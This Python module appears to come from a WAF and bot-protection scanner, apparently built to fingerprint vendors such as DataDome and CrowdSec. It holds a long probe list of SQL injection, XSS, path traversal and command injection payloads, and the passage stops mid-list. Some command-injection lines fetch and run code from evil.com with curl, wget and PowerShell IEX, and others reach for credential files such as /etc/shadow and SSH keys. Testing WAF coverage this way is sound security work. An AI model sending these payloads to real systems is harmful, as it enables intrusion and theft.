import logging
import shutil
import socket
import subprocess
import sys
import threading
from typing import Optional
from urllib.parse import urlparse

import requests
from rich.table import Table

from .utils import console, log, now_utc, stealth_headers, get_proxy_dict, get_basic_auth

BLOCK_CODES = {403, 406, 429, 503}

# ─── WAF / Bot-protection signatures ─────────────────────────────────────────
# Covers DataDome and CrowdSec (primary targets) plus all major vendors.

WAF_SIGNATURES = {
    # ── Primary targets ──────────────────────────────────────────────────────
    "DataDome": {
        "headers":  ["x-datadome", "x-datadome-cid", "x-dd-b", "x-dd-s", "x-datadome-isbot"],
        "body_kw":  ["datadome", "dd_referrer", "datadome.co", "_dd_s", "ddcaptcha"],
        "server":   [],
        "cookies":  ["datadome"],
        "notes":    "JS challenge + device fingerprinting. Blocking mode returns 403 with JS page.",
    },
    "CrowdSec": {
        "headers":  ["x-crowdsec", "x-crowdsec-action", "crowdsec-remediation"],
        "body_kw":  ["crowdsec", "crowdsecurity", "crowdsec.net", "crowdsec_ban"],
        "server":   [],
        "cookies":  [],
        "notes":    "Community-sourced IP reputation. Captcha or ban depending on scenario.",
    },
    # ── Major commercial vendors ──────────────────────────────────────────────
    "Cloudflare": {
        "headers":  ["cf-ray", "cf-cache-status", "cf-mitigated", "cf-edge-cache"],
        "body_kw":  ["cloudflare", "ray id", "__cf_bm", "cf-browser-verification", "attention required"],
        "server":   ["cloudflare"],
        "cookies":  ["__cf_bm", "cf_clearance"],
        "notes":    "Broad WAF + bot management. cf-ray present on every response.",
    },
    "PerimeterX": {
        "headers":  ["x-px-block-score", "x-px-uuid", "x-px-vid"],
        "body_kw":  ["perimeterx", "_pxvid", "px-captcha", "pxchallenge", "px.gif"],
        "server":   [],
        "cookies":  ["_px", "_pxvid", "pxcts", "_pxhd"],
        "notes":    "Widely used in e-commerce (Shopify, Magento). Behaviour-based.",
    },
    "Akamai Bot Manager": {
        "headers":  ["x-check-cacheable", "akamai-origin-hop", "x-akamai-transformed",
                     "x-akamai-request-id", "akamai-edge-log-uuid"],
        "body_kw":  ["akamai", "reference #", "akamai ghost", "access denied by akamai"],
        "server":   [],
        "cookies":  ["ak_bmsc", "bm_sz", "bm_sv"],
        "notes":    "Enterprise CDN + WAF. bm_sz cookie indicates Bot Manager active.",
    },
    "AWS WAF": {
        "headers":  ["x-amzn-waf-action", "x-amzn-requestid", "x-amz-apigw-id"],
        "body_kw":  ["aws waf", "request blocked", "awswaf", "403 forbidden"],
        "server":   [],
        "cookies":  ["aws-waf-token"],
        "notes":    "Common on AWS-hosted shops. aws-waf-token cookie for CAPTCHA challenges.",
    },
    "Imperva / Incapsula": {
        "headers":  ["x-iinfo", "x-cdn", "incap-ses", "x-sinadf"],
        "body_kw":  ["imperva", "incapsula", "request unsuccessful", "incap_ses",
                     "powered by incapsula"],
        "server":   [],
        "cookies":  ["incap_ses", "visid_incap", "nlbi_"],
        "notes":    "Often seen on financial/retail. incap_ses cookie is a strong indicator.",
    },
    "F5 BIG-IP ASM": {
        "headers":  ["x-wa-info", "x-cnection"],
        "body_kw":  ["the requested url was rejected", "f5 networks", "support id",
                     "please consult with your administrator"],
        "server":   ["big-ip"],
        "cookies":  ["TS01", "ts01"],
        "notes":    "Enterprise on-premise WAF. 'Support ID' in block page is definitive.",
    },
    "ModSecurity": {
        "headers":  [],
        "body_kw":  ["mod_security", "modsecurity", "not acceptable",
                     "406 not acceptable", "this error was generated by mod_security"],
        "server":   ["apache", "nginx"],
        "cookies":  [],
        "notes":    "Open-source WAF, often on Apache/Nginx. No distinctive headers.",
    },
    "Sucuri": {
        "headers":  ["x-sucuri-id", "x-sucuri-cache"],
        "body_kw":  ["sucuri", "sucuri website firewall", "access denied | sucuri"],
        "server":   ["sucuri"],
        "cookies":  [],
        "notes":    "Popular with WordPress shops. x-sucuri-id on every response.",
    },
    "Radware AppWall": {
        "headers":  ["x-rdwr-pop", "x-sl-compstate"],
        "body_kw":  ["radware", "appwall", "the requested url was blocked by radware"],
        "server":   [],
        "cookies":  [],
        "notes":    "Enterprise MSSP WAF. Uncommon in e-commerce.",
    },
    "Reblaze": {
        "headers":  ["x-reblaze-protection", "rbzid"],
        "body_kw":  ["reblaze", "this request has been blocked by reblaze"],
        "server":   [],
        "cookies":  ["rbzid"],
        "notes":    "Cloud-native WAF. rbzid session cookie is definitive.",
    },
    "Barracuda WAF": {
        "headers":  ["x-barracuda-link", "x-barracuda-start-time"],
        "body_kw":  ["barracuda", "barracuda networks", "barracuda web application firewall"],
        "server":   [],
        "cookies":  ["barra_counter_session"],
        "notes":    "SMB-focused WAF appliance.",
    },
}

# ─── CDN signatures ───────────────────────────────────────────────────────────

CDN_SIGNATURES = {
    "Cloudflare":    ["cf-ray", "cf-cache-status"],
    "Akamai":        ["x-check-cacheable", "akamai-origin-hop", "x-akamai-transformed"],
    "Fastly":        ["x-fastly-request-id", "fastly-restarts", "x-served-by"],
    "AWS CloudFront": ["x-amz-cf-id", "x-amz-cf-pop"],
    "Azure CDN":     ["x-msedge-ref"],
    "Varnish":       ["x-varnish"],
    "Squid":         ["x-squid-error"],
    "Nginx":         [],   # detected via Server header only
}

# ─── WAF probe payload library ────────────────────────────────────────────────
# Organised by attack category. Each probe has:
#   category  : used for grouping + per-category detection rate reporting
#   name      : short label shown in logs / table
#   path      : URL path (appended to target base)
#   params    : query-string dict
#   headers   : extra/override headers for this probe
#
# Detection = response status in BLOCK_CODES (403, 406, 429, 503)
# ~120 probes total, run in parallel (20 workers).

WAF_PROBES = [

    # ── SQL Injection (50 variants) ───────────────────────────────────────────
    {"category": "SQL Injection", "name": "SQLi classic OR",            "path": "/", "params": {"id": "1' OR '1'='1"},                                      "headers": {}},
    {"category": "SQL Injection", "name": "SQLi UNION 3col",            "path": "/", "params": {"id": "1 UNION SELECT 1,2,3--"},                             "headers": {}},
    {"category": "SQL Injection", "name": "SQLi comment --",            "path": "/", "params": {"q": "' OR 1=1--"},                                          "headers": {}},
    {"category": "SQL Injection", "name": "SQLi comment #",             "path": "/", "params": {"q": "' OR 1=1#"},                                           "headers": {}},
    {"category": "SQL Injection", "name": "SQLi stacked DROP",          "path": "/", "params": {"id": "1; DROP TABLE users--"},                              "headers": {}},
    {"category": "SQL Injection", "name": "SQLi boolean true",          "path": "/", "params": {"id": "1 AND 1=1"},                                          "headers": {}},
    {"category": "SQL Injection", "name": "SQLi boolean false",         "path": "/", "params": {"id": "1 AND 1=2"},                                          "headers": {}},
    {"category": "SQL Injection", "name": "SQLi sleep MySQL",           "path": "/", "params": {"id": "1' AND SLEEP(5)--"},                                  "headers": {}},
    {"category": "SQL Injection", "name": "SQLi sleep MSSQL",          "path": "/", "params": {"id": "1'; WAITFOR DELAY '0:0:5'--"},                         "headers": {}},
    {"category": "SQL Injection", "name": "SQLi error extractvalue",    "path": "/", "params": {"id": "' AND extractvalue(1,version())--"},                  "headers": {}},
    {"category": "SQL Injection", "name": "SQLi UNION NULL",            "path": "/", "params": {"id": "' UNION SELECT NULL,NULL,NULL--"},                    "headers": {}},
    {"category": "SQL Injection", "name": "SQLi hex encode",            "path": "/", "params": {"id": "1 OR 0x31=0x31"},                                     "headers": {}},
    {"category": "SQL Injection", "name": "SQLi URL encoded",           "path": "/", "params": {"id": "1%27%20OR%20%271%27%3D%271"},                         "headers": {}},
    {"category": "SQL Injection", "name": "SQLi INFORMATION_SCHEMA",    "path": "/", "params": {"id": "1 UNION SELECT table_name FROM information_schema.tables--"}, "headers": {}},
    {"category": "SQL Injection", "name": "SQLi blind substring",       "path": "/", "params": {"id": "1 AND SUBSTRING(version(),1,1)='5'"},                 "headers": {}},
    {"category": "SQL Injection", "name": "SQLi order by",              "path": "/", "params": {"id": "1 ORDER BY 10--"},                                    "headers": {}},
    {"category": "SQL Injection", "name": "SQLi INTO OUTFILE",          "path": "/", "params": {"id": "1 INTO OUTFILE '/tmp/x'"},                            "headers": {}},
    {"category": "SQL Injection", "name": "SQLi pg_sleep",              "path": "/", "params": {"id": "'; SELECT pg_sleep(5)--"},                            "headers": {}},
    {"category": "SQL Injection", "name": "SQLi in User-Agent",         "path": "/", "params": {},                                                            "headers": {"User-Agent": "' OR '1'='1"}},
    {"category": "SQL Injection", "name": "SQLi in Referer",            "path": "/", "params": {},                                                            "headers": {"Referer": "' UNION SELECT 1--"}},
    {"category": "SQL Injection", "name": "SQLi Oracle rownum",         "path": "/", "params": {"id": "1 AND ROWNUM=1"},                                     "headers": {}},
    {"category": "SQL Injection", "name": "SQLi Oracle UTL_HTTP",       "path": "/", "params": {"id": "1 AND UTL_HTTP.REQUEST('http://evil.com/')=1"},        "headers": {}},
    {"category": "SQL Injection", "name": "SQLi double quote",          "path": "/", "params": {"id": "1\" OR \"1\"=\"1"},                                   "headers": {}},
    {"category": "SQL Injection", "name": "SQLi backtick",              "path": "/", "params": {"id": "1` OR `1`=`1"},                                       "headers": {}},
    {"category": "SQL Injection", "name": "SQLi comment variation /*",  "path": "/", "params": {"id": "1 /*comment*/ OR /**/1=1"},                           "headers": {}},
    {"category": "SQL Injection", "name": "SQLi case variation",        "path": "/", "params": {"id": "1 uNiOn SeLeCt 1,2,3--"},                             "headers": {}},
    {"category": "SQL Injection", "name": "SQLi whitespace bypass",     "path": "/", "params": {"id": "1%09OR%091=1--"},                                     "headers": {}},
    {"category": "SQL Injection", "name": "SQLi null byte",             "path": "/", "params": {"id": "1%00' OR '1'='1"},                                    "headers": {}},
    {"category": "SQL Injection", "name": "SQLi in search",             "path": "/search", "params": {"q": "' OR 1=1--"},                                    "headers": {}},
    {"category": "SQL Injection", "name": "SQLi in login user",         "path": "/login", "params": {"username": "admin'--", "password": "x"},               "headers": {}},
    {"category": "SQL Injection", "name": "SQLi in login pass",         "path": "/login", "params": {"username": "admin", "password": "' OR '1'='1"},        "headers": {}},
    {"category": "SQL Injection", "name": "SQLi benchmark MySQL",       "path": "/", "params": {"id": "1 AND BENCHMARK(5000000,MD5('x'))--"},                 "headers": {}},
    {"category": "SQL Injection", "name": "SQLi UPDATEXML",             "path": "/", "params": {"id": "' AND UPDATEXML(1,CONCAT(0x7e,version()),1)--"},       "headers": {}},
    {"category": "SQL Injection", "name": "SQLi in Cookie",             "path": "/", "params": {},                                                            "headers": {"Cookie": "id=1' OR '1'='1"}},
    {"category": "SQL Injection", "name": "SQLi in X-Forwarded-For",    "path": "/", "params": {},                                                            "headers": {"X-Forwarded-For": "' OR 1=1--"}},
    {"category": "SQL Injection", "name": "SQLi UNION version()",       "path": "/", "params": {"id": "' UNION SELECT version(),NULL,NULL--"},                "headers": {}},
    {"category": "SQL Injection", "name": "SQLi PostgreSQL cast",       "path": "/", "params": {"id": "1 AND 1=CAST(1 AS INT)--"},                           "headers": {}},
    {"category": "SQL Injection", "name": "SQLi MSSQL xp_cmdshell",    "path": "/", "params": {"id": "1; EXEC xp_cmdshell('whoami')--"},                    "headers": {}},
    {"category": "SQL Injection", "name": "SQLi time blind POST",       "path": "/api/search", "params": {"query": "x' AND SLEEP(3)--"},                    "headers": {}},
    {"category": "SQL Injection", "name": "SQLi nested quotes",         "path": "/", "params": {"id": "1''OR''1''=''1"},                                     "headers": {}},
    {"category": "SQL Injection", "name": "SQLi CHAR() obfuscation",    "path": "/", "params": {"id": "1 OR CHAR(49)=CHAR(49)--"},                           "headers": {}},
    {"category": "SQL Injection", "name": "SQLi group by error",        "path": "/", "params": {"id": "' GROUP BY CONCAT(version(),0x7e,FLOOR(RAND(0)*2))--"}, "headers": {}},
    {"category": "SQL Injection", "name": "SQLi UNION user()",          "path": "/", "params": {"id": "' UNION SELECT user(),database(),@@version--"},        "headers": {}},
    {"category": "SQL Injection", "name": "SQLi in path param",         "path": "/product/1' OR '1'='1", "params": {},                                       "headers": {}},
    {"category": "SQL Injection", "name": "SQLi in api id",             "path": "/api/v1/users/1' OR '1'='1", "params": {},                                  "headers": {}},
    {"category": "SQL Injection", "name": "SQLi SSRF via DNS",          "path": "/", "params": {"id": "' AND LOAD_FILE('\\\\evil.com\\x')--"},               "headers": {}},
    {"category": "SQL Injection", "name": "SQLi second order hint",     "path": "/register", "params": {"username": "admin'--"},                             "headers": {}},
    {"category": "SQL Injection", "name": "SQLi SQLite sqlite_version",  "path": "/", "params": {"id": "1 AND sqlite_version()='3.x'--"},                    "headers": {}},
    {"category": "SQL Injection", "name": "SQLi tautology /*!*/",       "path": "/", "params": {"id": "1 /*!OR*/ 1=1--"},                                    "headers": {}},
    {"category": "SQL Injection", "name": "SQLi LIKE bypass",           "path": "/", "params": {"id": "1' OR 'x' LIKE 'x"},                                  "headers": {}},

    # ── XSS (45 variants) ────────────────────────────────────────────────────
    {"category": "XSS", "name": "XSS script tag",             "path": "/", "params": {"q": "<script>alert(1)</script>"},                                     "headers": {}},
    {"category": "XSS", "name": "XSS img onerror",            "path": "/", "params": {"q": "<img src=x onerror=alert(1)>"},                                  "headers": {}},
    {"category": "XSS", "name": "XSS svg onload",             "path": "/", "params": {"q": "<svg onload=alert(1)>"},                                         "headers": {}},
    {"category": "XSS", "name": "XSS javascript URI",         "path": "/", "params": {"q": "javascript:alert(1)"},                                           "headers": {}},
    {"category": "XSS", "name": "XSS event attr",             "path": "/", "params": {"q": "\" onmouseover=\"alert(1)"},                                     "headers": {}},
    {"category": "XSS", "name": "XSS body tag",               "path": "/", "params": {"q": "<body onload=alert(1)>"},                                        "headers": {}},
    {"category": "XSS", "name": "XSS iframe",                 "path": "/", "params": {"q": "<iframe src=javascript:alert(1)>"},                              "headers": {}},
    {"category": "XSS", "name": "XSS URL encoded",            "path": "/", "params": {"q": "%3Cscript%3Ealert(1)%3C/script%3E"},                             "headers": {}},
    {"category": "XSS", "name": "XSS double encoded",         "path": "/", "params": {"q": "%253Cscript%253Ealert(1)%253C/script%253E"},                     "headers": {}},
    {"category": "XSS", "name": "XSS in User-Agent",          "path": "/", "params": {},                                                                     "headers": {"User-Agent": "<script>alert(1)</script>"}},
    {"category": "XSS", "name": "XSS in Referer",             "path": "/", "params": {},                                                                     "headers": {"Referer": "https://evil.com/<script>alert(1)</script>"}},
    {"category": "XSS", "name": "XSS in Cookie",              "path": "/", "params": {},                                                                     "headers": {"Cookie": "x=<script>alert(1)</script>"}},
    {"category": "XSS", "name": "XSS case variation",         "path": "/", "params": {"q": "<ScRiPt>alert(1)</ScRiPt>"},                                     "headers": {}},
    {"category": "XSS", "name": "XSS null byte",              "path": "/", "params": {"q": "<scr\x00ipt>alert(1)</script>"},                                 "headers": {}},
    {"category": "XSS", "name": "XSS input tag",              "path": "/", "params": {"q": "<input onfocus=alert(1) autofocus>"},                            "headers": {}},
    {"category": "XSS", "name": "XSS details tag",            "path": "/", "params": {"q": "<details open ontoggle=alert(1)>"},                              "headers": {}},
    {"category": "XSS", "name": "XSS math tag",               "path": "/", "params": {"q": "<math><mtext></table></math><img src=x onerror=alert(1)>"},      "headers": {}},
    {"category": "XSS", "name": "XSS template literal",       "path": "/", "params": {"q": "${alert(1)}"},                                                   "headers": {}},
    {"category": "XSS", "name": "XSS polyglot",               "path": "/", "params": {"q": "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert(1) )//%0D%0A%0d%0a//</style/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1)//>"},  "headers": {}},
    {"category": "XSS", "name": "XSS DOM sink location",      "path": "/", "params": {"q": "#<script>alert(1)</script>"},                                    "headers": {}},
    {"category": "XSS", "name": "XSS data URI",               "path": "/", "params": {"url": "data:text/html,<script>alert(1)</script>"},                    "headers": {}},
    {"category": "XSS", "name": "XSS vbscript",               "path": "/", "params": {"q": "vbscript:alert(1)"},                                             "headers": {}},
    {"category": "XSS", "name": "XSS object tag",             "path": "/", "params": {"q": "<object data=javascript:alert(1)>"},                             "headers": {}},
    {"category": "XSS", "name": "XSS embed tag",              "path": "/", "params": {"q": "<embed src=javascript:alert(1)>"},                               "headers": {}},
    {"category": "XSS", "name": "XSS link tag",               "path": "/", "params": {"q": "<link rel=stylesheet href=javascript:alert(1)>"},                "headers": {}},
    {"category": "XSS", "name": "XSS meta refresh",           "path": "/", "params": {"q": "<meta http-equiv=refresh content=0;url=javascript:alert(1)>"},   "headers": {}},
    {"category": "XSS", "name": "XSS Angular expression",     "path": "/", "params": {"q": "{{constructor.constructor('alert(1)')()}}"},                     "headers": {}},
    {"category": "XSS", "name": "XSS React dangerousHTML",    "path": "/", "params": {"q": "<img src=1 onerror={alert(1)}>"},                                "headers": {}},
    {"category": "XSS", "name": "XSS CSS expression IE",      "path": "/", "params": {"q": "<style>body{background:url(javascript:alert(1))}</style>"},      "headers": {}},
    {"category": "XSS", "name": "XSS script in search",       "path": "/search", "params": {"q": "<script>alert(document.cookie)</script>"},                 "headers": {}},
    {"category": "XSS", "name": "XSS in X-Custom-Header",     "path": "/", "params": {},                                                                     "headers": {"X-Custom-Header": "<script>alert(1)</script>"}},
    {"category": "XSS", "name": "XSS hex entity",             "path": "/", "params": {"q": "&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;"},                "headers": {}},
    {"category": "XSS", "name": "XSS dec entity",             "path": "/", "params": {"q": "&#60;script&#62;alert(1)&#60;/script&#62;"},                    "headers": {}},
    {"category": "XSS", "name": "XSS attribute break",        "path": "/", "params": {"q": "'><img src=x onerror=alert(1)>"},                                "headers": {}},
    {"category": "XSS", "name": "XSS srcdoc iframe",          "path": "/", "params": {"q": "<iframe srcdoc=<script>alert(1)</script>>"},                     "headers": {}},
    {"category": "XSS", "name": "XSS tab obfuscation",        "path": "/", "params": {"q": "<img\tsrc=x\tonerror=alert(1)>"},                                "headers": {}},
    {"category": "XSS", "name": "XSS newline obfuscation",    "path": "/", "params": {"q": "<img\nsrc=x\nonerror=alert(1)>"},                                "headers": {}},
    {"category": "XSS", "name": "XSS in redirect param",      "path": "/", "params": {"redirect": "javascript:alert(1)"},                                    "headers": {}},
    {"category": "XSS", "name": "XSS in next param",          "path": "/login", "params": {"next": "javascript:alert(1)"},                                   "headers": {}},
    {"category": "XSS", "name": "XSS svg animate",            "path": "/", "params": {"q": "<svg><animate onbegin=alert(1) attributeName=x dur=1s>"},        "headers": {}},
    {"category": "XSS", "name": "XSS picture source",         "path": "/", "params": {"q": "<picture><source srcset=x onerror=alert(1)>"},                   "headers": {}},
    {"category": "XSS", "name": "XSS form action",            "path": "/", "params": {"q": "<form action=javascript:alert(1)><input type=submit>"},           "headers": {}},
    {"category": "XSS", "name": "XSS marquee",                "path": "/", "params": {"q": "<marquee onstart=alert(1)>"},                                    "headers": {}},
    {"category": "XSS", "name": "XSS video poster",           "path": "/", "params": {"q": "<video poster=x onerror=alert(1)>"},                             "headers": {}},
    {"category": "XSS", "name": "XSS base href",              "path": "/", "params": {"q": "<base href=javascript:alert(1)//>"},                             "headers": {}},

    # ── Path Traversal (30 variants) ─────────────────────────────────────────
    {"category": "Path Traversal", "name": "Traversal unix basic",        "path": "/../../../etc/passwd",                        "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal windows basic",     "path": "/../../../windows/system32/drivers/etc/hosts","params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal URL encoded",       "path": "/%2e%2e%2f%2e%2e%2fetc%2fpasswd",            "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal double encoded",    "path": "/%252e%252e%252fetc%252fpasswd",              "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal null byte",         "path": "/../../../etc/passwd%00",                    "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal 8 levels",          "path": "/../../../../../../../../etc/passwd",         "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal mixed slash",       "path": "/..%2f..%2f..%2fetc/passwd",                 "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal in param file",     "path": "/", "params": {"file": "../../etc/passwd"},                "headers": {}},
    {"category": "Path Traversal", "name": "Traversal in param path",     "path": "/", "params": {"path": "../../../etc/shadow"},             "headers": {}},
    {"category": "Path Traversal", "name": "Traversal etc shadow",        "path": "/../../../etc/shadow",                       "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal proc self",         "path": "/../../../proc/self/environ",                "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal win SAM",           "path": "/../../../windows/system32/config/SAM",      "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal backslash",         "path": "/..\\..\\..\\etc\\passwd",                   "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal overlong UTF8",     "path": "/%c0%ae%c0%ae/etc/passwd",                   "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal in X-Path hdr",    "path": "/", "params": {},                            "headers": {"X-File-Path": "../../../etc/passwd"}},
    {"category": "Path Traversal", "name": "Traversal /etc/hosts",        "path": "/../../../etc/hosts",                        "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal /etc/issue",        "path": "/../../../etc/issue",                        "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal .ssh/id_rsa",       "path": "/../../../../../../root/.ssh/id_rsa",         "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal .bash_history",     "path": "/../../../../../../root/.bash_history",       "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal web.config",        "path": "/../web.config",                             "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal appsettings.json",  "path": "/../appsettings.json",                       "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal .env file",         "path": "/../.env",                                   "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal /var/log/auth.log", "path": "/../../../var/log/auth.log",                 "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal triple encode",     "path": "/%25%32%65%25%32%65%25%32%66etc%25%32fpasswd","params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal unicode dot",       "path": "/../../etc/passwd",                          "params": {}, "headers": {}},
    {"category": "Path Traversal", "name": "Traversal in include param",  "path": "/", "params": {"include": "../../etc/passwd"},             "headers": {}},
    {"category": "Path Traversal", "name": "Traversal in page param",     "path": "/", "params": {"page": "../../etc/passwd"},                "headers": {}},
    {"category": "Path Traversal", "name": "Traversal in doc param",      "path": "/", "params": {"doc": "../../etc/passwd"},                 "headers": {}},
    {"category": "Path Traversal", "name": "Traversal in lang param",     "path": "/", "params": {"lang": "../../etc/passwd"},                "headers": {}},
    {"category": "Path Traversal", "name": "Traversal ../ repeated",      "path": "/.././.././.././../etc/passwd",               "params": {}, "headers": {}},

    # ── Command Injection (30 variants) ───────────────────────────────────────
    {"category": "Command Injection", "name": "CMDi semicolon ls",        "path": "/", "params": {"cmd": "; ls -la"},                         "headers": {}},
    {"category": "Command Injection", "name": "CMDi pipe whoami",         "path": "/", "params": {"cmd": "| whoami"},                         "headers": {}},
    {"category": "Command Injection", "name": "CMDi backtick id",         "path": "/", "params": {"q": "`id`"},                               "headers": {}},
    {"category": "Command Injection", "name": "CMDi subshell",            "path": "/", "params": {"q": "$(cat /etc/passwd)"},                 "headers": {}},
    {"category": "Command Injection", "name": "CMDi && id",               "path": "/", "params": {"q": "1 && id"},                           "headers": {}},
    {"category": "Command Injection", "name": "CMDi || id",               "path": "/", "params": {"q": "1 || id"},                           "headers": {}},
    {"category": "Command Injection", "name": "CMDi newline",             "path": "/", "params": {"q": "1\nid"},                             "headers": {}},
    {"category": "Command Injection", "name": "CMDi windows dir",         "path": "/", "params": {"cmd": "& dir"},                           "headers": {}},
    {"category": "Command Injection", "name": "CMDi curl exfil",          "path": "/", "params": {"q": "; curl http://169.254.169.254/"},     "headers": {}},
    {"category": "Command Injection", "name": "CMDi in User-Agent",       "path": "/", "params": {},                                          "headers": {"User-Agent": "() { :; }; curl http://evil.com/"}},
    {"category": "Command Injection", "name": "CMDi shellshock",          "path": "/", "params": {},                                          "headers": {"User-Agent": "() { ignored; }; echo Content-Type: text/plain; echo; echo SHELLSHOCK"}},
    {"category": "Command Injection", "name": "CMDi in Referer",          "path": "/", "params": {},                                          "headers": {"Referer": "http://evil.com/; ls"}},
    {"category": "Command Injection", "name": "CMDi URL encoded pipe",    "path": "/", "params": {"cmd": "%7C%20whoami"},                     "headers": {}},
    {"category": "Command Injection", "name": "CMDi null byte bypass",    "path": "/", "params": {"cmd": "ls%00"},                            "headers": {}},
    {"category": "Command Injection", "name": "CMDi encoded semicolon",   "path": "/", "params": {"cmd": "%3B%20id"},                         "headers": {}},
    {"category": "Command Injection", "name": "CMDi PowerShell IEX",      "path": "/", "params": {"cmd": "; powershell -c IEX(New-Object Net.WebClient).DownloadString('http://evil.com/')"},  "headers": {}},
    {"category": "Command Injection", "name": "CMDi python exec",         "path": "/", "params": {"q": "; python3 -c 'import os;os.system(\"id\")'"},         "headers": {}},
    {"category": "Command Injection", "name": "CMDi tee write",           "path": "/", "params": {"q": "; id | tee /tmp/pwned"},                             "headers": {}},
    {"category": "Command Injection", "name": "CMDi nslookup",            "path": "/", "params": {"q": "& nslookup evil.com"},                               "headers": {}},
    {"category": "Command Injection", "name": "CMDi ping",                "path": "/", "params": {"host": "; ping -c 1 evil.com"},                           "headers": {}},
    {"category": "Command Injection", "name": "CMDi in X-Header",        "path": "/", "params": {},                                                           "headers": {"X-Command": "; id"}},
    {"category": "Command Injection", "name": "CMDi wget exfil",          "path": "/", "params": {"url": "; wget http://evil.com/"},                          "headers": {}},
    {"category": "Command Injection", "name": "CMDi env variable",        "path": "/", "params": {"q": "$PATH"},                                             "headers": {}},
    {"category": "Command Injection", "name": "CMDi carriage return",     "path": "/", "params": {"q": "1\r\nid"},                                           "headers": {}},
    {"category": "Command Injection", "name": "CMDi heredoc",             "path": "/", "params": {"q": "1 <<< $(id)"},                                       "headers": {}},
    {"category": "Command Injection", "name": "CMDi process sub",         "path": "/", "params": {"q": "1 <(id)"},                                           "headers": {}},
    {"category": "Command Injection", "name": "CMDi brace expand",        "path": "/", "params": {"q": "{id,whoami}"},                                       "headers": {}},
    {"category": "Command Injection", "name": "CMDi IFS bypass",          "path": "/", "params": {"q": "i${IFS}d"},                                          "headers": {}},
    {"category": "Command Injection", "name": "CMDi cat passwd via env",  "path": "/", "params": {"q": "$(</etc/passwd)"},                                   "headers": {}},
    {"category": "Command Injection", "name": "CMDi base64 decode exec",  "path": "/", "params": {"q": "$(echo aWQ= | base64 -d | bash)"},                   "headers": {}},

    # ── Bot / Scanner UA (40 variants) ───────────────────────────────────────
    {"category": "Bot / Scanner UA", "name": "UA python-requests",        "path": "/", "params": {}, "headers": {"User-Agent": "python-requests/2.31.0"}},
    {"category": "Bot / Scanner UA", "name": "UA curl",                   "path": "/", "params": {}, "headers": {"User-Agent": "curl/7.88.1"}},
    {"category": "Bot / Scanner UA", "name": "UA wget",                   "path": "/", "params": {}, "headers": {"User-Agent": "Wget/1.21.3"}},
    {"category": "Bot / Scanner UA", "name": "UA Go http client",         "path": "/", "params": {}, "headers": {"User-Agent": "Go-http-client/1.1"}},
    {"category": "Bot / Scanner UA", "name": "UA Java",                   "path": "/", "params": {}, "headers": {"User-Agent": "Java/1.8.0_292"}},
    {"category": "Bot / Scanner UA", "name": "UA Scrapy",                 "path": "/", "params": {}, "headers": {"User-Agent": "Scrapy/2.11.0 (+https://scrapy.org)"}},
    {"category": "Bot / Scanner UA", "name": "UA Nikto",                  "path": "/", "params": {}, "headers": {"User-Agent": "Nikto/2.1.6"}},
    {"category": "Bot / Scanner UA", "name": "UA SQLMap",                 "path": "/", "params": {}, "headers": {"User-Agent": "sqlmap/1.7 (https://sqlmap.org)"}},
    {"category": "Bot / Scanner UA", "name": "UA Nmap NSE",               "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (compatible; Nmap Scripting Engine)"}},
    {"category": "Bot / Scanner UA", "name": "UA Acunetix",               "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (compatible; acunetix-scanning)"}},
    {"category": "Bot / Scanner UA", "name": "UA Burp Suite",             "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (compatible; BurpSuite)"}},
    {"category": "Bot / Scanner UA", "name": "UA Masscan",                "path": "/", "params": {}, "headers": {"User-Agent": "masscan/1.3"}},
    {"category": "Bot / Scanner UA", "name": "UA Nuclei",                 "path": "/", "params": {}, "headers": {"User-Agent": "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"}},
    {"category": "Bot / Scanner UA", "name": "UA ZAP",                    "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (compatible; OWASP ZAP 2.14.0)"}},
    {"category": "Bot / Scanner UA", "name": "UA OpenVAS",                "path": "/", "params": {}, "headers": {"User-Agent": "OpenVAS/9.0"}},
    {"category": "Bot / Scanner UA", "name": "UA empty",                  "path": "/", "params": {}, "headers": {"User-Agent": ""}},
    {"category": "Bot / Scanner UA", "name": "UA whitespace only",        "path": "/", "params": {}, "headers": {"User-Agent": "   "}},
    {"category": "Bot / Scanner UA", "name": "UA HeadlessChrome",         "path": "/", "params": {}, "headers": {"User-Agent": "HeadlessChrome/124.0.0.0"}},
    {"category": "Bot / Scanner UA", "name": "UA PhantomJS",              "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34"}},
    {"category": "Bot / Scanner UA", "name": "UA Selenium",               "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/124.0.0.0 Safari/537.36; Selenium/4.0.0"}},
    {"category": "Bot / Scanner UA", "name": "UA libwww-perl",            "path": "/", "params": {}, "headers": {"User-Agent": "libwww-perl/6.67"}},
